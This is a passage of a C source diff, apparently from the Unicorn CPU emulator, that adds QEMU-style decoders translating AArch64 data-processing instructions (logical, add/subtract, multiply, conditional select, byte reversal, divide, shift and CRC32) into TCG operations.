/* Extract */ + disas_extract(s, insn); + break; + default: + unallocated_encoding(s); + break; + } +} + +/* Shift a TCGv src by TCGv shift_amount, put result in dst. + * Note that it is the caller's responsibility to ensure that the + * shift amount is in range (ie 0..31 or 0..63) and provide the ARM + * mandated semantics for out of range shifts. + */ +static void shift_reg(TCGContext *tcg_ctx, TCGv_i64 dst, TCGv_i64 src, int sf, + enum a64_shift_type shift_type, TCGv_i64 shift_amount) +{ + switch (shift_type) { + case A64_SHIFT_TYPE_LSL: + tcg_gen_shl_i64(tcg_ctx, dst, src, shift_amount); + break; + case A64_SHIFT_TYPE_LSR: + tcg_gen_shr_i64(tcg_ctx, dst, src, shift_amount); + break; + case A64_SHIFT_TYPE_ASR: + if (!sf) { + tcg_gen_ext32s_i64(tcg_ctx, dst, src); + } + tcg_gen_sar_i64(tcg_ctx, dst, sf ? src : dst, shift_amount); + break; + case A64_SHIFT_TYPE_ROR: + if (sf) { + tcg_gen_rotr_i64(tcg_ctx, dst, src, shift_amount); + } else { + TCGv_i32 t0, t1; + t0 = tcg_temp_new_i32(tcg_ctx); + t1 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, t0, src); + tcg_gen_trunc_i64_i32(tcg_ctx, t1, shift_amount); + tcg_gen_rotr_i32(tcg_ctx, t0, t0, t1); + tcg_gen_extu_i32_i64(tcg_ctx, dst, t0); + tcg_temp_free_i32(tcg_ctx, t0); + tcg_temp_free_i32(tcg_ctx, t1); + } + break; + default: + assert(FALSE); /* all shift types should be handled */ + break; + } + + if (!sf) { /* zero extend final result */ + tcg_gen_ext32u_i64(tcg_ctx, dst, dst); + } +} + +/* Shift a TCGv src by immediate, put result in dst. + * The shift amount must be in range (this should always be true as the + * relevant instructions will UNDEF on bad shift immediates). + */ +static void shift_reg_imm(TCGContext *tcg_ctx, TCGv_i64 dst, TCGv_i64 src, int sf, + enum a64_shift_type shift_type, unsigned int shift_i) +{ + assert(shift_i < (sf ? 64 : 32)); + + if (shift_i == 0) { + tcg_gen_mov_i64(tcg_ctx, dst, src); + } else { + TCGv_i64 shift_const; + + shift_const = tcg_const_i64(tcg_ctx, shift_i); + shift_reg(tcg_ctx, dst, src, sf, shift_type, shift_const); + tcg_temp_free_i64(tcg_ctx, shift_const); + } +} + +/* C3.5.10 Logical (shifted register) + * 31 30 29 28 24 23 22 21 20 16 15 10 9 5 4 0 + * +----+-----+-----------+-------+---+------+--------+------+------+ + * | sf | opc | 0 1 0 1 0 | shift | N | Rm | imm6 | Rn | Rd | + * +----+-----+-----------+-------+---+------+--------+------+------+ + */ +static void disas_logic_reg(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_rd, tcg_rn, tcg_rm; + unsigned int sf, opc, shift_type, invert, rm, shift_amount, rn, rd; + + sf = extract32(insn, 31, 1); + opc = extract32(insn, 29, 2); + shift_type = extract32(insn, 22, 2); + invert = extract32(insn, 21, 1); + rm = extract32(insn, 16, 5); + shift_amount = extract32(insn, 10, 6); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + + if (!sf && (shift_amount & (1 << 5))) { + unallocated_encoding(s); + return; + } + + tcg_rd = cpu_reg(s, rd); + + if (opc == 1 && shift_amount == 0 && shift_type == 0 && rn == 31) { + /* Unshifted ORR and ORN with WZR/XZR is the standard encoding for + * register-register MOV and MVN, so it is worth special casing. + */ + tcg_rm = cpu_reg(s, rm); + if (invert) { + tcg_gen_not_i64(tcg_ctx, tcg_rd, tcg_rm); + if (!sf) { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } + } else { + if (sf) { + tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_rm); + } else { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rm); + } + } + return; + } + + tcg_rm = read_cpu_reg(s, rm, sf); + + if (shift_amount) { + shift_reg_imm(tcg_ctx, tcg_rm, tcg_rm, sf, shift_type, shift_amount); + } + + tcg_rn = cpu_reg(s, rn); + + switch (opc | (invert << 2)) { + case 0: /* AND */ + case 3: /* ANDS */ + tcg_gen_and_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + break; + case 1: /* ORR */ + tcg_gen_or_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + break; + case 2: /* EOR */ + tcg_gen_xor_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + break; + case 4: /* BIC */ + case 7: /* BICS */ + tcg_gen_andc_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + break; + case 5: /* ORN */ + tcg_gen_orc_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + break; + case 6: /* EON */ + tcg_gen_eqv_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + break; + default: + assert(FALSE); + break; + } + + if (!sf) { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } + + if (opc == 3) { + gen_logic_CC(tcg_ctx, sf, tcg_rd); + } +} + +/* + * C3.5.1 Add/subtract (extended register) + * + * 31|30|29|28 24|23 22|21|20 16|15 13|12 10|9 5|4 0| + * +--+--+--+-----------+-----+--+-------+------+------+----+----+ + * |sf|op| S| 0 1 0 1 1 | opt | 1| Rm |option| imm3 | Rn | Rd | + * +--+--+--+-----------+-----+--+-------+------+------+----+----+ + * + * sf: 0 -> 32bit, 1 -> 64bit + * op: 0 -> add , 1 -> sub + * S: 1 -> set flags + * opt: 00 + * option: extension type (see DecodeRegExtend) + * imm3: optional shift to Rm + * + * Rd = Rn + LSL(extend(Rm), amount) + */ +static void disas_add_sub_ext_reg(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int imm3 = extract32(insn, 10, 3); + int option = extract32(insn, 13, 3); + int rm = extract32(insn, 16, 5); + bool setflags = extract32(insn, 29, 1); + bool sub_op = extract32(insn, 30, 1); + bool sf = extract32(insn, 31, 1); + + TCGv_i64 tcg_rm, tcg_rn; /* temps */ + TCGv_i64 tcg_rd; + TCGv_i64 tcg_result; + + if (imm3 > 4) { + unallocated_encoding(s); + return; + } + + /* non-flag setting ops may use SP */ + if (!setflags) { + tcg_rd = cpu_reg_sp(s, rd); + } else { + tcg_rd = cpu_reg(s, rd); + } + tcg_rn = read_cpu_reg_sp(s, rn, sf); + + tcg_rm = read_cpu_reg(s, rm, sf); + ext_and_shift_reg(tcg_ctx, tcg_rm, tcg_rm, option, imm3); + + tcg_result = tcg_temp_new_i64(tcg_ctx); + + if (!setflags) { + if (sub_op) { + tcg_gen_sub_i64(tcg_ctx, tcg_result, tcg_rn, tcg_rm); + } else { + tcg_gen_add_i64(tcg_ctx, tcg_result, tcg_rn, tcg_rm); + } + } else { + if (sub_op) { + gen_sub_CC(s, sf, tcg_result, tcg_rn, tcg_rm); + } else { + gen_add_CC(s, sf, tcg_result, tcg_rn, tcg_rm); + } + } + + if (sf) { + tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_result); + } else { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_result); + } + + tcg_temp_free_i64(tcg_ctx, tcg_result); +} + +/* + * C3.5.2 Add/subtract (shifted register) + * + * 31 30 29 28 24 23 22 21 20 16 15 10 9 5 4 0 + * +--+--+--+-----------+-----+--+-------+---------+------+------+ + * |sf|op| S| 0 1 0 1 1 |shift| 0| Rm | imm6 | Rn | Rd | + * +--+--+--+-----------+-----+--+-------+---------+------+------+ + * + * sf: 0 -> 32bit, 1 -> 64bit + * op: 0 -> add , 1 -> sub + * S: 1 -> set flags + * shift: 00 -> LSL, 01 -> LSR, 10 -> ASR, 11 -> RESERVED + * imm6: Shift amount to apply to Rm before the add/sub + */ +static void disas_add_sub_reg(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int imm6 = extract32(insn, 10, 6); + int rm = extract32(insn, 16, 5); + int shift_type = extract32(insn, 22, 2); + bool setflags = extract32(insn, 29, 1); + bool sub_op = extract32(insn, 30, 1); + bool sf = extract32(insn, 31, 1); + + TCGv_i64 tcg_rd = cpu_reg(s, rd); + TCGv_i64 tcg_rn, tcg_rm; + TCGv_i64 tcg_result; + + if ((shift_type == 3) || (!sf && (imm6 > 31))) { + unallocated_encoding(s); + return; + } + + tcg_rn = read_cpu_reg(s, rn, sf); + tcg_rm = read_cpu_reg(s, rm, sf); + + shift_reg_imm(tcg_ctx, tcg_rm, tcg_rm, sf, shift_type, imm6); + + tcg_result = tcg_temp_new_i64(tcg_ctx); + + if (!setflags) { + if (sub_op) { + tcg_gen_sub_i64(tcg_ctx, tcg_result, tcg_rn, tcg_rm); + } else { + tcg_gen_add_i64(tcg_ctx, tcg_result, tcg_rn, tcg_rm); + } + } else { + if (sub_op) { + gen_sub_CC(s, sf, tcg_result, tcg_rn, tcg_rm); + } else { + gen_add_CC(s, sf, tcg_result, tcg_rn, tcg_rm); + } + } + + if (sf) { + tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_result); + } else { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_result); + } + + tcg_temp_free_i64(tcg_ctx, tcg_result); +} + +/* C3.5.9 Data-processing (3 source) + + 31 30 29 28 24 23 21 20 16 15 14 10 9 5 4 0 + +--+------+-----------+------+------+----+------+------+------+ + |sf| op54 | 1 1 0 1 1 | op31 | Rm | o0 | Ra | Rn | Rd | + +--+------+-----------+------+------+----+------+------+------+ + + */ +static void disas_data_proc_3src(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int ra = extract32(insn, 10, 5); + int rm = extract32(insn, 16, 5); + int op_id = (extract32(insn, 29, 3) << 4) | + (extract32(insn, 21, 3) << 1) | + extract32(insn, 15, 1); + bool sf = extract32(insn, 31, 1); + bool is_sub = extract32(op_id, 0, 1); + bool is_high = extract32(op_id, 2, 1); + bool is_signed = false; + TCGv_i64 tcg_op1; + TCGv_i64 tcg_op2; + TCGv_i64 tcg_tmp; + + /* Note that op_id is sf:op54:op31:o0 so it includes the 32/64 size flag */ + switch (op_id) { + case 0x42: /* SMADDL */ + case 0x43: /* SMSUBL */ + case 0x44: /* SMULH */ + is_signed = true; + break; + case 0x0: /* MADD (32bit) */ + case 0x1: /* MSUB (32bit) */ + case 0x40: /* MADD (64bit) */ + case 0x41: /* MSUB (64bit) */ + case 0x4a: /* UMADDL */ + case 0x4b: /* UMSUBL */ + case 0x4c: /* UMULH */ + break; + default: + unallocated_encoding(s); + return; + } + + if (is_high) { + TCGv_i64 low_bits = tcg_temp_new_i64(tcg_ctx); /* low bits discarded */ + TCGv_i64 tcg_rd = cpu_reg(s, rd); + TCGv_i64 tcg_rn = cpu_reg(s, rn); + TCGv_i64 tcg_rm = cpu_reg(s, rm); + + if (is_signed) { + tcg_gen_muls2_i64(tcg_ctx, low_bits, tcg_rd, tcg_rn, tcg_rm); + } else { + tcg_gen_mulu2_i64(tcg_ctx, low_bits, tcg_rd, tcg_rn, tcg_rm); + } + + tcg_temp_free_i64(tcg_ctx, low_bits); + return; + } + + tcg_op1 = tcg_temp_new_i64(tcg_ctx); + tcg_op2 = tcg_temp_new_i64(tcg_ctx); + tcg_tmp = tcg_temp_new_i64(tcg_ctx); + + if (op_id < 0x42) { + tcg_gen_mov_i64(tcg_ctx, tcg_op1, cpu_reg(s, rn)); + tcg_gen_mov_i64(tcg_ctx, tcg_op2, cpu_reg(s, rm)); + } else { + if (is_signed) { + tcg_gen_ext32s_i64(tcg_ctx, tcg_op1, cpu_reg(s, rn)); + tcg_gen_ext32s_i64(tcg_ctx, tcg_op2, cpu_reg(s, rm)); + } else { + tcg_gen_ext32u_i64(tcg_ctx, tcg_op1, cpu_reg(s, rn)); + tcg_gen_ext32u_i64(tcg_ctx, tcg_op2, cpu_reg(s, rm)); + } + } + + if (ra == 31 && !is_sub) { + /* Special-case MADD with rA == XZR; it is the standard MUL alias */ + tcg_gen_mul_i64(tcg_ctx, cpu_reg(s, rd), tcg_op1, tcg_op2); + } else { + tcg_gen_mul_i64(tcg_ctx, tcg_tmp, tcg_op1, tcg_op2); + if (is_sub) { + tcg_gen_sub_i64(tcg_ctx, cpu_reg(s, rd), cpu_reg(s, ra), tcg_tmp); + } else { + tcg_gen_add_i64(tcg_ctx, cpu_reg(s, rd), cpu_reg(s, ra), tcg_tmp); + } + } + + if (!sf) { + tcg_gen_ext32u_i64(tcg_ctx, cpu_reg(s, rd), cpu_reg(s, rd)); + } + + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + tcg_temp_free_i64(tcg_ctx, tcg_tmp); +} + +/* C3.5.3 - Add/subtract (with carry) + * 31 30 29 28 27 26 25 24 23 22 21 20 16 15 10 9 5 4 0 + * +--+--+--+------------------------+------+---------+------+-----+ + * |sf|op| S| 1 1 0 1 0 0 0 0 | rm | opcode2 | Rn | Rd | + * +--+--+--+------------------------+------+---------+------+-----+ + * [000000] + */ + +static void disas_adc_sbc(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int sf, op, setflags, rm, rn, rd; + TCGv_i64 tcg_y, tcg_rn, tcg_rd; + + if (extract32(insn, 10, 6) != 0) { + unallocated_encoding(s); + return; + } + + sf = extract32(insn, 31, 1); + op = extract32(insn, 30, 1); + setflags = extract32(insn, 29, 1); + rm = extract32(insn, 16, 5); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + + tcg_rd = cpu_reg(s, rd); + tcg_rn = cpu_reg(s, rn); + + if (op) { + tcg_y = new_tmp_a64(s); + tcg_gen_not_i64(tcg_ctx, tcg_y, cpu_reg(s, rm)); + } else { + tcg_y = cpu_reg(s, rm); + } + + if (setflags) { + gen_adc_CC(s, sf, tcg_rd, tcg_rn, tcg_y); + } else { + gen_adc(s, sf, tcg_rd, tcg_rn, tcg_y); + } +} + +/* C3.5.4 - C3.5.5 Conditional compare (immediate / register) + * 31 30 29 28 27 26 25 24 23 22 21 20 16 15 12 11 10 9 5 4 3 0 + * +--+--+--+------------------------+--------+------+----+--+------+--+-----+ + * |sf|op| S| 1 1 0 1 0 0 1 0 |imm5/rm | cond |i/r |o2| Rn |o3|nzcv | + * +--+--+--+------------------------+--------+------+----+--+------+--+-----+ + * [1] y [0] [0] + */ +static void disas_cc(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int sf, op, y, cond, rn, nzcv, is_imm; + int label_continue = -1; + TCGv_i64 tcg_tmp, tcg_y, tcg_rn; + + if (!extract32(insn, 29, 1)) { + unallocated_encoding(s); + return; + } + if (insn & (1 << 10 | 1 << 4)) { + unallocated_encoding(s); + return; + } + sf = extract32(insn, 31, 1); + op = extract32(insn, 30, 1); + is_imm = extract32(insn, 11, 1); + y = extract32(insn, 16, 5); /* y = rm (reg) or imm5 (imm) */ + cond = extract32(insn, 12, 4); + rn = extract32(insn, 5, 5); + nzcv = extract32(insn, 0, 4); + + if (cond < 0x0e) { /* not always */ + int label_match = gen_new_label(tcg_ctx); + label_continue = gen_new_label(tcg_ctx); + arm_gen_test_cc(tcg_ctx, cond, label_match); + /* nomatch: */ + tcg_tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_movi_i64(tcg_ctx, tcg_tmp, nzcv << 28); + gen_set_nzcv(tcg_ctx, tcg_tmp); + tcg_temp_free_i64(tcg_ctx, tcg_tmp); + tcg_gen_br(tcg_ctx, label_continue); + gen_set_label(tcg_ctx, label_match); + } + /* match, or condition is always */ + if (is_imm) { + tcg_y = new_tmp_a64(s); + tcg_gen_movi_i64(tcg_ctx, tcg_y, y); + } else { + tcg_y = cpu_reg(s, y); + } + tcg_rn = cpu_reg(s, rn); + + tcg_tmp = tcg_temp_new_i64(tcg_ctx); + if (op) { + gen_sub_CC(s, sf, tcg_tmp, tcg_rn, tcg_y); + } else { + gen_add_CC(s, sf, tcg_tmp, tcg_rn, tcg_y); + } + tcg_temp_free_i64(tcg_ctx, tcg_tmp); + + if (cond < 0x0e) { /* continue */ + gen_set_label(tcg_ctx, label_continue); + } +} + +/* C3.5.6 Conditional select + * 31 30 29 28 21 20 16 15 12 11 10 9 5 4 0 + * +----+----+---+-----------------+------+------+-----+------+------+ + * | sf | op | S | 1 1 0 1 0 1 0 0 | Rm | cond | op2 | Rn | Rd | + * +----+----+---+-----------------+------+------+-----+------+------+ + */ +static void disas_cond_select(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int sf, else_inv, rm, cond, else_inc, rn, rd; + TCGv_i64 tcg_rd, tcg_src; + + if (extract32(insn, 29, 1) || extract32(insn, 11, 1)) { + /* S == 1 or op2<1> == 1 */ + unallocated_encoding(s); + return; + } + sf = extract32(insn, 31, 1); + else_inv = extract32(insn, 30, 1); + rm = extract32(insn, 16, 5); + cond = extract32(insn, 12, 4); + else_inc = extract32(insn, 10, 1); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + + if (rd == 31) { + /* silly no-op write; until we use movcond we must special-case + * this to avoid a dead temporary across basic blocks. + */ + return; + } + + tcg_rd = cpu_reg(s, rd); + + if (cond >= 0x0e) { /* condition "always" */ + tcg_src = read_cpu_reg(s, rn, sf); + tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_src); + } else { + /* OPTME: we could use movcond here, at the cost of duplicating + * a lot of the arm_gen_test_cc() logic. + */ + int label_match = gen_new_label(tcg_ctx); + int label_continue = gen_new_label(tcg_ctx); + + arm_gen_test_cc(tcg_ctx, cond, label_match); + /* nomatch: */ + tcg_src = cpu_reg(s, rm); + + if (else_inv && else_inc) { + tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_src); + } else if (else_inv) { + tcg_gen_not_i64(tcg_ctx, tcg_rd, tcg_src); + } else if (else_inc) { + tcg_gen_addi_i64(tcg_ctx, tcg_rd, tcg_src, 1); + } else { + tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_src); + } + if (!sf) { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } + tcg_gen_br(tcg_ctx, label_continue); + /* match: */ + gen_set_label(tcg_ctx, label_match); + tcg_src = read_cpu_reg(s, rn, sf); + tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_src); + /* continue: */ + gen_set_label(tcg_ctx, label_continue); + } +} + +static void handle_clz(DisasContext *s, unsigned int sf, + unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_rd, tcg_rn; + tcg_rd = cpu_reg(s, rd); + tcg_rn = cpu_reg(s, rn); + + if (sf) { + gen_helper_clz64(tcg_ctx, tcg_rd, tcg_rn); + } else { + TCGv_i32 tcg_tmp32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_tmp32, tcg_rn); + gen_helper_clz(tcg_ctx, tcg_tmp32, tcg_tmp32); + tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_tmp32); + tcg_temp_free_i32(tcg_ctx, tcg_tmp32); + } +} + +static void handle_cls(DisasContext *s, unsigned int sf, + unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_rd, tcg_rn; + tcg_rd = cpu_reg(s, rd); + tcg_rn = cpu_reg(s, rn); + + if (sf) { + gen_helper_cls64(tcg_ctx, tcg_rd, tcg_rn); + } else { + TCGv_i32 tcg_tmp32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_tmp32, tcg_rn); + gen_helper_cls32(tcg_ctx, tcg_tmp32, tcg_tmp32); + tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_tmp32); + tcg_temp_free_i32(tcg_ctx, tcg_tmp32); + } +} + +static void handle_rbit(DisasContext *s, unsigned int sf, + unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_rd, tcg_rn; + tcg_rd = cpu_reg(s, rd); + tcg_rn = cpu_reg(s, rn); + + if (sf) { + gen_helper_rbit64(tcg_ctx, tcg_rd, tcg_rn); + } else { + TCGv_i32 tcg_tmp32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_tmp32, tcg_rn); + gen_helper_rbit(tcg_ctx, tcg_tmp32, tcg_tmp32); + tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_tmp32); + tcg_temp_free_i32(tcg_ctx, tcg_tmp32); + } +} + +/* C5.6.149 REV with sf==1, opcode==3 ("REV64") */ +static void handle_rev64(DisasContext *s, unsigned int sf, + unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (!sf) { + unallocated_encoding(s); + return; + } + tcg_gen_bswap64_i64(tcg_ctx, cpu_reg(s, rd), cpu_reg(s, rn)); +} + +/* C5.6.149 REV with sf==0, opcode==2 + * C5.6.151 REV32 (sf==1, opcode==2) + */ +static void handle_rev32(DisasContext *s, unsigned int sf, + unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_rd = cpu_reg(s, rd); + + if (sf) { + TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_rn = read_cpu_reg(s, rn, sf); + + /* bswap32_i64 requires zero high word */ + tcg_gen_ext32u_i64(tcg_ctx, tcg_tmp, tcg_rn); + tcg_gen_bswap32_i64(tcg_ctx, tcg_rd, tcg_tmp); + tcg_gen_shri_i64(tcg_ctx, tcg_tmp, tcg_rn, 32); + tcg_gen_bswap32_i64(tcg_ctx, tcg_tmp, tcg_tmp); + tcg_gen_concat32_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_tmp); + + tcg_temp_free_i64(tcg_ctx, tcg_tmp); + } else { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, cpu_reg(s, rn)); + tcg_gen_bswap32_i64(tcg_ctx, tcg_rd, tcg_rd); + } +} + +/* C5.6.150 REV16 (opcode==1) */ +static void handle_rev16(DisasContext *s, unsigned int sf, + unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_rd = cpu_reg(s, rd); + TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_rn = read_cpu_reg(s, rn, sf); + + tcg_gen_andi_i64(tcg_ctx, tcg_tmp, tcg_rn, 0xffff); + tcg_gen_bswap16_i64(tcg_ctx, tcg_rd, tcg_tmp); + + tcg_gen_shri_i64(tcg_ctx, tcg_tmp, tcg_rn, 16); + tcg_gen_andi_i64(tcg_ctx, tcg_tmp, tcg_tmp, 0xffff); + tcg_gen_bswap16_i64(tcg_ctx, tcg_tmp, tcg_tmp); + tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_tmp, 16, 16); + + if (sf) { + tcg_gen_shri_i64(tcg_ctx, tcg_tmp, tcg_rn, 32); + tcg_gen_andi_i64(tcg_ctx, tcg_tmp, tcg_tmp, 0xffff); + tcg_gen_bswap16_i64(tcg_ctx, tcg_tmp, tcg_tmp); + tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_tmp, 32, 16); + + tcg_gen_shri_i64(tcg_ctx, tcg_tmp, tcg_rn, 48); + tcg_gen_bswap16_i64(tcg_ctx, tcg_tmp, tcg_tmp); + tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_tmp, 48, 16); + } + + tcg_temp_free_i64(tcg_ctx, tcg_tmp); +} + +/* C3.5.7 Data-processing (1 source) + * 31 30 29 28 21 20 16 15 10 9 5 4 0 + * +----+---+---+-----------------+---------+--------+------+------+ + * | sf | 1 | S | 1 1 0 1 0 1 1 0 | opcode2 | opcode | Rn | Rd | + * +----+---+---+-----------------+---------+--------+------+------+ + */ +static void disas_data_proc_1src(DisasContext *s, uint32_t insn) +{ + unsigned int sf, opcode, rn, rd; + + if (extract32(insn, 29, 1) || extract32(insn, 16, 5)) { + unallocated_encoding(s); + return; + } + + sf = extract32(insn, 31, 1); + opcode = extract32(insn, 10, 6); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + + switch (opcode) { + case 0: /* RBIT */ + handle_rbit(s, sf, rn, rd); + break; + case 1: /* REV16 */ + handle_rev16(s, sf, rn, rd); + break; + case 2: /* REV32 */ + handle_rev32(s, sf, rn, rd); + break; + case 3: /* REV64 */ + handle_rev64(s, sf, rn, rd); + break; + case 4: /* CLZ */ + handle_clz(s, sf, rn, rd); + break; + case 5: /* CLS */ + handle_cls(s, sf, rn, rd); + break; + } +} + +static void handle_div(DisasContext *s, bool is_signed, unsigned int sf, + unsigned int rm, unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_n, tcg_m, tcg_rd; + tcg_rd = cpu_reg(s, rd); + + if (!sf && is_signed) { + tcg_n = new_tmp_a64(s); + tcg_m = new_tmp_a64(s); + tcg_gen_ext32s_i64(tcg_ctx, tcg_n, cpu_reg(s, rn)); + tcg_gen_ext32s_i64(tcg_ctx, tcg_m, cpu_reg(s, rm)); + } else { + tcg_n = read_cpu_reg(s, rn, sf); + tcg_m = read_cpu_reg(s, rm, sf); + } + + if (is_signed) { + gen_helper_sdiv64(tcg_ctx, tcg_rd, tcg_n, tcg_m); + } else { + gen_helper_udiv64(tcg_ctx, tcg_rd, tcg_n, tcg_m); + } + + if (!sf) { /* zero extend final result */ + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } +} + +/* C5.6.115 LSLV, C5.6.118 LSRV, C5.6.17 ASRV, C5.6.154 RORV */ +static void handle_shift_reg(DisasContext *s, + enum a64_shift_type shift_type, unsigned int sf, + unsigned int rm, unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_shift = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_rd = cpu_reg(s, rd); + TCGv_i64 tcg_rn = read_cpu_reg(s, rn, sf); + + tcg_gen_andi_i64(tcg_ctx, tcg_shift, cpu_reg(s, rm), sf ? 63 : 31); + shift_reg(tcg_ctx, tcg_rd, tcg_rn, sf, shift_type, tcg_shift); + tcg_temp_free_i64(tcg_ctx, tcg_shift); +} + +/* CRC32[BHWX], CRC32C[BHWX] */ +static void handle_crc32(DisasContext *s, + unsigned int sf, unsigned int sz, bool crc32c, + unsigned int rm, unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_acc, tcg_val; + TCGv_i32 tcg_bytes; + + if (!arm_dc_feature(s, ARM_FEATURE_CRC) + || (sf == 1 && sz != 3) + || (sf == 0 && sz == 3)) { + unallocated_encoding(s); + return; + } + + if (sz == 3) { + tcg_val = cpu_reg(s, rm); + } else { + uint64_t mask; + switch (sz) { + case 0: + mask = 0xFF; + break; + case 1: + mask = 0xFFFF; + break; + case 2: + mask = 0xFFFFFFFF; + break; + default: + g_assert_not_reached(); + } + tcg_val = new_tmp_a64(s); + tcg_gen_andi_i64(tcg_ctx, tcg_val, cpu_reg(s, rm), mask); + } + + tcg_acc = cpu_reg(s, rn); + tcg_bytes = tcg_const_i32(tcg_ctx, 1 << sz); + + if (crc32c) { + gen_helper_crc32c_64(tcg_ctx, cpu_reg(s, rd), tcg_acc, tcg_val, tcg_bytes); + } else { + gen_helper_crc32_64(tcg_ctx, cpu_reg(s, rd), tcg_acc, tcg_val, tcg_bytes); + } + + tcg_temp_free_i32(tcg_ctx, tcg_bytes); +} + +/* C3.5.8 Data-processing (2 source) + * 31 30 29 28 21 20 16 15 10 9 5 4 0 + * +----+---+---+-----------------+------+--------+------+------+ + * | sf | 0 | S | 1 1 0 1 0 1 1 0 | Rm | opcode | Rn | Rd | + * +----+---+---+-----------------+------+--------+------+------+ + */ +static void disas_data_proc_2src(DisasContext *s, uint32_t insn) +{ + unsigned int sf, rm, opcode, rn, rd; + sf = extract32(insn, 31, 1); + rm = extract32(insn, 16, 5); + opcode = extract32(insn, 10, 6); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + + if (extract32(insn, 29, 1)) { + unallocated_encoding(s); + return; + } + + switch (opcode) { + case 2: /* UDIV */ + handle_div(s, false, sf, rm, rn, rd); + break; + case 3: /* SDIV */ + handle_div(s, true, sf, rm, rn, rd); + break; + case 8: /* LSLV */ + handle_shift_reg(s, A64_SHIFT_TYPE_LSL, sf, rm, rn, rd); + break; + case 9: /* LSRV */ + handle_shift_reg(s, A64_SHIFT_TYPE_LSR, sf, rm, rn, rd); + break; + case 10: /* ASRV */ + handle_shift_reg(s, A64_SHIFT_TYPE_ASR, sf, rm, rn, rd); + break; + case 11: /* RORV */ + handle_shift_reg(s, A64_SHIFT_TYPE_ROR, sf, rm, rn, rd); + break; + case 16: + case 17: + case 18: + case 19: + case 20: + case 21: + case 22: + case 23: /* CRC32 */ + { + int sz = extract32(opcode, 0, 2); + bool crc32c = extract32(opcode, 2, 1); + handle_crc32(s, sf, sz, crc32c, rm, rn, rd); + break; + } + default: + unallocated_encoding(s); + break; + } +} + +/* C3.5 Data processing - register */ +static void 